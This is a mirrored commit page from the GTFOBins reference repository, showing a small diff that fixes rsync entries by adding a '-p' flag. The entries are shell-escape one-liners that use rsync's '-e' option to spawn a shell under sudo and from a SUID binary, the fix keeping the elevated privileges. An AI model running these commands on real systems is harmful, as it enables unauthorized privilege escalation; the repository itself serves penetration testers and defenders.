mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-18 22:29:25 +02:00
Fix rsync issue #388 by adding missing -p flag
This commit is contained in:
@@ -5,5 +5,5 @@ functions:
|
||||
sudo:
|
||||
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
suid:
|
||||
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
- code: ./rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
---
|
||||
|
Reference in New Issue
Block a user